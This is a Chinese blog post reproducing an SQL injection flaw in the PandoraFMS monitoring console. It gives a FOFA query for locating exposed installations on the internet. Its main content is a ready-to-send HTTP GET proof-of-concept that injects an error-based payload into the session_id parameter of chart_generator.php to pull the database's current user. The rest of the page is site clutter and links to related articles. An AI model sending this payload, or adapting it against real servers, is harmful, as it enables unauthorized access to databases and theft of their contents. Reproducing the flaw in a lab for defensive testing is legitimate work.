PandoraFMS 监控软件 SQL注入漏洞复现

已于 2023-12-09 03:50:49 修改
阅读量729 收藏 7
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-09 03:45:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134890022
版权

0x01 产品简介

Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。

0x02 漏洞概述

Pandora FMS监控软件存在SQL注入漏洞,攻击者通过chart_generator.php 来执行恶意语句,获取数据库敏感信息。

0x03 复现环境

FOFA:app="PANDORAFMS-产品"

0x04 漏洞复现

PoC

GET /pandora_console/include/chart_generator.php?session_id=1'%20OR%20(SELECT%206562%20FROM(SELECT%20COUNT(*),CONCAT(0x7176767171,(SELECT%20MID((IFNULL(CAST(CURRENT_USER()%20AS%20NCHAR),0x20)),1,54)),0x71627a6a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20WIkG HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

 查询当前用户

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
PandoraFMS 监控软件 任意文件上传漏洞
0xSec
12-09 952
PandoraFMS upload_head_image.php 接口处存在未授权文件上传漏洞,攻击者可上传恶意木马获取服务器权限。
fms安装教程 linux_如何借助Pandora FMS监控CentOS和Ubuntu服务器?
weixin_34369597的博客
02-06 527
引言Pandora FMS(Pandora灵活监控系统)是一款灵活、高度可扩展的监控软件,可以用来监控网络、服务器、应用程序和虚拟机等环境。Pandora FMS可以监控不同服务器操作系统和服务器应用系统(比如Web服务器、数据库和代理系统等)的状态及性能。Pandora FMS由服务器软件监控代理组成。我在本教程中将介绍如何将Pandora FMS Server安装到CentOS 7上,以及如...
pandorafms:Pandora FMS是一个灵活且高度可扩展的监视系统,适用于大型环境。 它使用代理(Linux,Windows,AIX,HP-UX,Solaris和BSD系统),并且可以进行本地和远程网络监视(SNMP v3,TCP检查,WMI等)。
02-03
Pandora FMS是用于IT基础架构管理的监视软件,其中包括网络设备,Windows和Unix服务器,虚拟基础架构以及所有不同类型的应用程序。 它具有大量功能,使其成为新一代软件,可以发组织可能需要的所有监视问题。 支持 要获得社区支持,您可以访问我们的论坛,为 。 请访问我们的社区页面,为 ,如果您需要商业信息或/和专业支持,请访问 。 如何安装Pandora FMS 安装Pandora FMS是一项非常简单的任务。 请访问我们的Wiki,并按照描述的所有步骤进行快速正确的安装。 什么是Pandora FMS? Pandora FMS是一个监视应用程序,用于监视系统和应用程序,该应
HTB-Pandora
weixin_44193247的博客
10-01 2199
HTB_学习篇
java pandora_Pandora FMS监视简介
cumj63710的博客
07-11 1514
java pandora Pandora灵活监控解决方案(FMS)是通用的监控软件,这意味着它可以控制网络设备,服务器(Linux和Windows),虚拟环境,应用程序,数据库等等。 它可以进行远程监视,也可以基于服务器上安装的代理进行监视。 您可以在报告和图形中获取收集的数据,并在出问题时发出警报。 Pandora FMS提供两种版本: 开源社区版针对各种规模的私人用户和组织,并且功能齐...
Goby 漏洞发布|PandoraFMS 软件 upload_head_image.php 任意文件上传漏洞
m0_46699477的博客
06-21 290
PandoraFMS是美国PandoraFMS的一个应用软件。提供一个监控功能。PandoraFMS upload_head_image.php 存在未授权文件上传漏洞,攻击者可上传恶意木马获取服务器权限。
CSZ CMS 1.2.X sql注入漏洞
最新发布
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。...* 对服务器IIS日志的监控和分析,以便及时发SQL注入漏洞
PHPCMS2008广告模板SQL注入漏洞
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞软件SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
如何在Ubuntu 20.04中安装Pandora FMS监视工具
A5互联
10-30 688
Pandora FMS又称 “Pandora Flexible Monitoring System”,是一款用于服务器、网络、应用和虚拟基础设施的监控工具。它简单、可扩展,适用于杂和较大的环境。它使用多种协议,包括TCP、UDP、SNMP、HTTP和代理来收集不同的指标。你可以使用Pandora FMS监控Web服务器、数据库服务器、应用程序、路由器和其他网络设备的状态和性能。 在本文中,我们将向介绍如何在香港服务器Ubuntu 20.04系统上安装和配置Pandora FMS。 先决条件 正常运行Ubu
7.23引以为戒 马后炮不如加强系统监控
chaos436的专栏
09-26 2110
原文地址:http://server.zol.com.cn/242/2422737_all.html#p2422737 马后炮不如加强系统监控   “7·23”甬温线特别重大铁路交通事故发生已经有十余天了,国务院事故调查组正在紧锣密鼓地
网站及监控利器 Pandora FMS使用体验
weixin_33943836的博客
03-20 145
 Pandora FMS 是一个 开源的应用程序 ,用来监测网站的各种活动,它可以收到实时的监测报告,并发送到你指定的邮箱,也可以通过e-mail, SMS 发送。               更多Linux下的监控软件请关注《Linux企业应用案例精解》一书...
常见五大开源网络监控软件测评分析
dream_Kelly的博客
09-14 2405
  如何缩减成本是IT高管面临的永恒难题,确保企业中所有的东西满足服务水平协议对资源本就紧张的IT部门是极具挑战的。开源软件为企业节约成本带来了曙光,相较于更昂贵的商业产品,开源软件提供了极具吸引力的替代方案,但是开源产品可以提供企业级效果吗?   为了回答这个问题,我们测试了五个开源产品:OpenNMS、Pandora FMS、NetXMS、SugarNMS和Zabbix。这四个产品都有稳...
网站监控系统 Pandora FMS
G.Q.F的专栏
08-13 598
Pandora FMS 是一个 开源的应用程序 ,用来监测网站的各种活动。 如果一个网站超额或当机,如果网站内容改变,硬盘或CPU被远程服务调用时(通过SNMP 或 TCP/IP),以及其它情况。 Pandora FMS 可以运行于任何操作系统, 获取数据并发送到服务器。 你可以收到实时的监测报告,并发送到你指定的邮箱。 它也可以通过e-mail, SMS 或 Jabber...
eyoucms1.6sql注入漏洞
06-09
eyoucms 1.6存在多个SQL注入漏洞,攻击者可以利用这些漏洞在系统中执行恶意代码,获取系统权限,窃取敏感信息等。 解决这些漏洞的方法包括: 1. 及时升级eyoucms到最新版本,开发者通常会根据安全漏洞进行版本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值